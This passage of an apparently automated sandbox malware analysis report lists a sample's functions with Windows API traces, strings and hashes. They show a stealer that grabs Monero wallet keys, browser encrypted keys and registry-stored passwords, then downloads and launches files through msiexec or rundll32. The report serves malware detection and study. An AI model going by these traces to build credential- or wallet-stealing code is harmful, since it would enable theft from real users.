                  • Opcode Fuzzy Hash: b26f575baf9edda7667d3e7f421dc1904a7f97e3655c79c9a8a2b7c4485b0560
                  • Instruction Fuzzy Hash: AD71FC75D20208ABDB04EFE4DC89FEEB7B8BF48300F108518F615AB291DB74A955CB65
                  Function 002B2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 39c3d69e6621f341d20eb543ab631873b8cedde2b95f4971f7b9f1c7a8e1af53
                  • Instruction ID: 882473f7265e187971e5d7e6310308e84426d6c9687983a7fcbf2b635a829e92
                  • Opcode Fuzzy Hash: 39c3d69e6621f341d20eb543ab631873b8cedde2b95f4971f7b9f1c7a8e1af53
                  • Instruction Fuzzy Hash: 6A120071820108AADB15FBA0DC92FEEB778AF14340F504169F50776591EF742B6ACFA2
                  Function 002B52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A6280: InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                    • Part of subcall function 002A6280: StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                    • Part of subcall function 002A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                    • Part of subcall function 002A6280: HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                    • Part of subcall function 002A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                    • Part of subcall function 002A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5318
                  • lstrlen.KERNEL32(00000000), ref: 002B532F
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 002B5364
                  • lstrlen.KERNEL32(00000000), ref: 002B5383
                  • lstrlen.KERNEL32(00000000), ref: 002B53AE
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 128db4327a59db3fec7414a03502c7339efce210bf997158677be01b2f191e90
                  • Instruction ID: 66c44d132886e48342454296a4c4ed5fa12d6023822e8eb67efd1fd9669d1583
                  • Opcode Fuzzy Hash: 128db4327a59db3fec7414a03502c7339efce210bf997158677be01b2f191e90
                  • Instruction Fuzzy Hash: 1051DE30930148ABCB24FF60C9A7BED7779AF11381F504128F8066A592DF746B65DF62
                  Function 002B12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 5774b47af7225189db541ef5d6dcdef433d2de08f0146332d280027ecc4eaf24
                  • Instruction ID: 6cdd77b96d3073bba47eef06887571f86854d9735b2ee3e653ab8ddc8e2fd9d7
                  • Opcode Fuzzy Hash: 5774b47af7225189db541ef5d6dcdef433d2de08f0146332d280027ecc4eaf24
                  • Instruction Fuzzy Hash: 7AC193B5D10209ABCB14EF60DCD9FEA7378BB54344F004598E50A67242DB70AEA5CF91
                  Function 002B4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B42EC
                  • lstrcat.KERNEL32(?,00D5F1D0), ref: 002B430B
                  • lstrcat.KERNEL32(?,?), ref: 002B431F
                  • lstrcat.KERNEL32(?,00D5D9E8), ref: 002B4333
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8D90: GetFileAttributesA.KERNEL32(00000000,?,002A1B54,?,?,002C564C,?,?,002C0E1F), ref: 002B8D9F
                    • Part of subcall function 002A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002A9D39
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B93C0: GlobalAlloc.KERNEL32(00000000,002B43DD,002B43DD), ref: 002B93D3
                  • StrStrA.SHLWAPI(?,00D5F128), ref: 002B43F3
                  • GlobalFree.KERNEL32(?), ref: 002B4512
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                    • Part of subcall function 002A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                    • Part of subcall function 002A9AC0: LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 002B44A3
                  • StrCmpCA.SHLWAPI(?,002C08D1), ref: 002B44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 002B44E5
                  • lstrcat.KERNEL32(00000000,002C0FB8), ref: 002B44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: ccb24424cd5150e7bb3b30ef334473f40d09689734c9d793e27602ab2616973a
                  • Instruction ID: 1a0e42e3d8929e7f81138931081cc2501acb200674b33539d2184862cb8ac54c
                  • Opcode Fuzzy Hash: ccb24424cd5150e7bb3b30ef334473f40d09689734c9d793e27602ab2616973a
                  • Instruction Fuzzy Hash: 917113B6910208ABDB14FBA0DC85FEE7779BB48340F044598F60996182EE74EB65CF91
                  Function 002A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002A12B4
                    • Part of subcall function 002A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 002A12BB
                    • Part of subcall function 002A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002A12D7
                    • Part of subcall function 002A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002A12F5
                    • Part of subcall function 002A12A0: RegCloseKey.ADVAPI32(?), ref: 002A12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 002A134F
                  • lstrlen.KERNEL32(?), ref: 002A135C
                  • lstrcat.KERNEL32(?,.keys), ref: 002A1377
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002A1465
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 002A14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: cb3e5076135cb0a77d13df02cff487672ecc0cee33c9d7e87cfa92775b656115
                  • Instruction ID: 22568df214ddb032738722c98537d39066cdd76760c5536924409ded2d303cb5
                  • Opcode Fuzzy Hash: cb3e5076135cb0a77d13df02cff487672ecc0cee33c9d7e87cfa92775b656115
                  • Instruction Fuzzy Hash: 005158B1D6011967CB15FB60DC92FED737CAF54340F4041E8B60A66092EE306BA9CFA6
                  Function 002A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A733A
                    • Part of subcall function 002A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002A73B1
                    • Part of subcall function 002A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002A740D
                    • Part of subcall function 002A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 002A7452
                    • Part of subcall function 002A72D0: HeapFree.KERNEL32(00000000), ref: 002A7459
                  • lstrcat.KERNEL32(00000000,002C17FC), ref: 002A7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 002A765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A768F
                  • lstrcat.KERNEL32(00000000,002C1804), ref: 002A76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A76D3
                  • lstrcat.KERNEL32(00000000,002C1808), ref: 002A76ED
                  • task.LIBCPMTD ref: 002A76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 9d06f518a3aa8eb6a52e99f8a309c9a8f58a208684cb15384318c2ca4399ff22
                  • Instruction ID: 4c558586d004c0a19dad1bec753adb7ec8c8d63cc38201ee20509fe9a60ecd63
                  • Opcode Fuzzy Hash: 9d06f518a3aa8eb6a52e99f8a309c9a8f58a208684cb15384318c2ca4399ff22
                  • Instruction Fuzzy Hash: 83314E71D20149DFCB04EBB4DC96EFE7778BB46301B144528F102AB292DE34A966CF55
                  Function 002B8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D5F6E0,00000000,?,002C0E2C,00000000,?,00000000), ref: 002B8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 002B8158
                  • __aulldiv.LIBCMT ref: 002B8172
                  • __aulldiv.LIBCMT ref: 002B8180
                  • wsprintfA.USER32 ref: 002B81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 5a61e57a511f0e5738b4a5e17e01f4daf3ce510cbf2a08ec99d9c39a68690c0e
                  • Instruction ID: f8f30fd8181aba52dee8170838f74dc1ef7e7d80c87b4c241efa9e94801194a1
                  • Opcode Fuzzy Hash: 5a61e57a511f0e5738b4a5e17e01f4daf3ce510cbf2a08ec99d9c39a68690c0e
                  • Instruction Fuzzy Hash: F12151B1D54248ABDB00DFD4CC49FEEB778FB44740F104519F605BB280D77869118BA5
                  Function 002A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                  • InternetOpenA.WININET(002C0DF7,00000001,00000000,00000000,00000000), ref: 002A610F
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 002A618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002A61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002A61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002A620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 002A6249
                  • InternetCloseHandle.WININET(?), ref: 002A6253
                  • InternetCloseHandle.WININET(00000000), ref: 002A6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 70fe8ccf4643b93ecfe630240a4324240bf2a2f9175af7920c65e7377d9bf6a8
                  • Instruction ID: fa85840127e8a47cd06cf06b35225cc67a0abb3825912cd8c060a54b0db1d501
                  • Opcode Fuzzy Hash: 70fe8ccf4643b93ecfe630240a4324240bf2a2f9175af7920c65e7377d9bf6a8
                  • Instruction Fuzzy Hash: 5A5194B1910218ABDF20DF60DC49BEE7778FB44701F1481A8B605AB1C1DF74AA95CF95
